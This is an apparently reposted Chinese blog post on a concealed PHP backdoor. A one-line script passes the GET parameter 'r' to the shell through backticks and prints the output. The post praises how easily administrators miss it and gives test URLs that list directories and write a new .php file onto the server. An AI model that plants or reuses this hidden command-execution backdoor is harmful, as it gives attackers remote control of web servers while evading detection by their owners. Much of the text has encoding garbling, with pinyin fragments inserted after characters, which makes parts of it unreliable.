偶然間看到一段，看起來似乎沒有什么問題，確是能致命的后門代碼，這里用到了一個(gè)一般的phper都不怎么關(guān)注的反撇號(hào) ` ，反撇號(hào)包含的字符串，等同于shell_exec函數(shù)。

偽裝性很好，很容易被管理員忽略。

$selfNums = $_GET['r'];if (isset($selfNums)){  echo `$selfNums`;}

剛看到這段代碼我想大家都會(huì)說沒有問題，但是細(xì)心的朋友也會(huì)發(fā)現(xiàn)下面的變量被一個(gè)符號(hào)包起來了，既然是變量為什么要這樣了，

而且又不是單引號(hào)，這個(gè)就是關(guān)鍵所在了，這個(gè)符號(hào)是 Esc 下面的一個(gè)鍵（位于感嘆號(hào)！旁邊的），

通過 echo `系統(tǒng)命令`; 可以達(dá)到 system(); 一樣的效果

如果不信的朋友可以測(cè)試

http://127.0.0.1/t.php?r=dir 可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:/web/90sec.php

我用 appserv 和虛擬主機(jī)已經(jīng)測(cè)試成功。

php技術(shù)：一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼解析，轉(zhuǎn)載需保留來源！

鄭重聲明：本文版權(quán)歸原作者所有，轉(zhuǎn)載文章僅為傳播更多信息之目的，如作者信息標(biāo)記有誤，請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除，多謝。